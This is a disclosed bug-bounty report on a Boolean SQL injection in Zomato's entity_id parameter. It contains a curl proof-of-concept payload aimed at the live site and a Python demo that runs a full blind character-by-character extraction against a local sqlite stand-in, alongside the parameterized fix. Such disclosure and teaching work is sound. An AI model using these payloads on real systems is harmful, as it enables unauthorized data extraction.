[www.zomato.com] Boolean SQLi - /█████.php
Zomato
Team Summary
Official summary from Zomato
@gerben_javado found that the parameter entity_id was vulnerable to SQLi on the endpoint /████.php using a Boolean technique.

## POC

The POC uses `if(mid(@@version,1,1)=5`, which returns a 200 OK message. If changed to `if(mid(@@version,1,1)=4`, the server gives a 500 or 504 error, confirming the SQLi and proving data extraction.

```
curl -H 'Host: www.zomato.com' -H 'Cookie: PHPSESSID=XXXXX' 'https://www.zomato.com/████.php?entity_type=restaurant&entity_id=1+or+if(mid(@@version,1,1)=5,1,2)=2%23' -k
```

Thanks @gerben_javado for helping us in keeping @zomato secure :)
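The summary above shows a single Boolean check (first character of `@@version` equal to 5 or not). The script below is an added example, written for this page and not code from Zomato or from the reporter, that reproduces the mechanism offline and generalises it to full character-by-character extraction. It assumes a stand-in application backed by sqlite3: since sqlite3 has no `@@version`, `mid()` or `if()`, a constructed version string is stored in a `meta` table and `substr()`/`CASE` stand in for MySQL's `mid()`/`if()`, with `--` standing in for MySQL's `#` line comment. The report only states that the false branch returned a 500/504; modelling that as "the query matched more than one row" is an assumption of this example. The `entities` table, its rows and the `FAKE_VERSION` value are all constructed.

```python
import sqlite3
import string

# Constructed stand-in for the MySQL @@version string the report probes (assumption:
# the version value, the table and the sqlite3 dialect are all this example's own).
FAKE_VERSION = "5.7.38-log"


def setup_db():
    """Build an in-memory database with a constructed 'entities' table and a fake version row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entities (entity_id INTEGER PRIMARY KEY, entity_type TEXT, name TEXT)")
    conn.executemany("INSERT INTO entities VALUES (?, ?, ?)",
                     [(1, "restaurant", "Cafe One"), (2, "restaurant", "Cafe Two")])
    conn.execute("CREATE TABLE meta (version TEXT)")
    conn.execute("INSERT INTO meta VALUES (?)", (FAKE_VERSION,))
    return conn


def vulnerable_lookup(conn, entity_type, entity_id):
    """Mirror of the flaw in the report: entity_id is concatenated straight into the SQL.

    Returns an HTTP-like status. The report observed 200 for the true branch and a
    500/504 for the false branch; here that is modelled (an assumption about the
    failure mode) as 500 when the query errors or when it matches more than one row.
    """
    sql = (f"SELECT name FROM entities WHERE entity_type='{entity_type}' "
           f"AND entity_id={entity_id}")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return 500
    if len(rows) == 1:
        return 200
    return 500 if rows else 404


def safe_lookup(conn, entity_type, entity_id):
    """Hardened form: a parameterized query, so the payload can no longer alter the SQL."""
    rows = conn.execute(
        "SELECT name FROM entities WHERE entity_type=? AND entity_id=?",
        (entity_type, entity_id),
    ).fetchall()
    return 200 if rows else 404


def boolean_payload(condition_sql):
    """Same shape as the report's payload  1 or if(<cond>,1,2)=2#  in sqlite3 syntax.

    True condition  -> CASE yields 1 -> 1=2 is false -> only entity 1 matches -> 200.
    False condition -> CASE yields 2 -> 2=2 is true  -> every row matches    -> error.
    """
    return f"1 or (CASE WHEN {condition_sql} THEN 1 ELSE 2 END)=2 --"


def oracle(conn, condition_sql):
    """One Boolean probe: True iff the injected condition held (the 200 branch)."""
    return vulnerable_lookup(conn, "restaurant", boolean_payload(condition_sql)) == 200


def extract_via_oracle(conn, expr_sql, max_len=32,
                       charset=string.digits + string.ascii_letters + ".-_"):
    """Generalise the report's single-character check: for every position of the
    result of expr_sql, try each candidate character until one returns the 200
    branch; stop at the first position where no candidate matches (end of string)."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(conn, f"substr(({expr_sql}), {pos}, 1)='{ch}'"):
                result += ch
                break
        else:
            break  # no candidate matched: end of string, or a character outside charset
    return result


if __name__ == "__main__":
    db = setup_db()
    probe = "substr((SELECT version FROM meta),1,1)"
    print("true branch  :", vulnerable_lookup(db, "restaurant", boolean_payload(probe + "='5'")))
    print("false branch :", vulnerable_lookup(db, "restaurant", boolean_payload(probe + "='4'")))
    print("extracted    :", extract_via_oracle(db, "SELECT version FROM meta"))
    print("parameterized:", safe_lookup(db, "restaurant", boolean_payload("1=1")))
```

Two caveats when carrying this back to MySQL: the report's `mid(@@version,1,1)=5` compares a string to an integer and relies on MySQL's implicit string-to-number coercion, so it only works for digit positions, and MySQL's default collations compare case-insensitively, so a full character walk there needs `BINARY` or `ASCII()`/`ORD()` comparisons to distinguish upper from lower case. The parameterized form is the fix regardless of dialect.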
Reported by: gerben_javado
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $1000.00
Weakness: SQL Injection